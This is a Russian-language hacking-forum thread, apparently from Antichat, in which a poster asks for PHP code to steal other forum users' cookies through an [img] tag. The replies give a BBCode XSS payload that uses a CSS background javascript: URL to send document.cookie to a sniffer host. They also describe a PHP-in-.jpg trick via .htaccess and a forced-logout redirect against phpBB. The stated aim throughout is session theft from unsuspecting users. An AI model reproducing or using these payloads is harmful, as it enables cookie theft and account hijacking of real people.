Собственно не подскажет ли кто-нить php-код (в пхп я 0) при исполнении которого высылались бы на тот же сниффер античата кукизы?
Это я все к уязвимости через [img], когда можно заставить юзверя айти на страничку и выполнить код. Что-нибудь безобидное - типа разлогинивания - легко.. А вот как сделать что-нибудь серьезное я не знаю...
И вообще возможно ли это? ) Хотя я думаю, что возможно..

хм... либо я тебя не понял, либо ты неправильно выразился. Какие кукизы тебе php должен выслать? или тебе код самого сниффире нужен?

Никакая не уязвимость, например есть картинка которую смотрит юзер, в директории в которой есть данная картинка, там же лежит файл .htaccess с содержанием AddType application/x-httpd-php .jpg смотря какое расширение у картинке,т.е. jpg файл обрабатывается как php. В самом файле например sniffer.jpg идёт пхп код, который содержит переменные окружения, а он в свою очередь отсылает их в log.

подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?

http://aaa.aa/=`aaa.jpg[/*IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
типа что то этого ты имел ввиду?
без зведочек естественно

Нет у я немного про другую уязвимость. Создаешь директорию /*.jpg . И тэгуешь ее в [img] . В директории создаешь файл index.php - и он исполняется...
<?php
header("Location: http://hosttobeexploited/phpBB/login.php?logout=true");
exit;
?>
Вот это как написано везде получается выполнять - разлогинивание. А вот как выполнить что-нить серьезное я хз.

подожди... или ты хочешь, чтобы ты вставил [*img]http://xxx.xx/sniffer.jpg[/img] и те кукисы отослались?
Да. так тоже можно )

Собственно неважно каким способом, я бы хотел добиться эффекта как в XSSе предыдущем с тэгом [url]. Загружается .jpg на страничке и при загрузке шлются кукизы юзера с этого форума.
Я думаю для тех, кто знает php на уровне пользователя не тяжело подсказать-с

Итак, кто-нить может помочь? если че моя ася 174621979

Ты че систему аутентификации чтоли делаешь?

Все таки ты какал... а я предупреждал тебя... и не один раз... что нельзя тебе какать... эх...
Laggi, ты конешно молодец... додумался хорошо, но это не работает...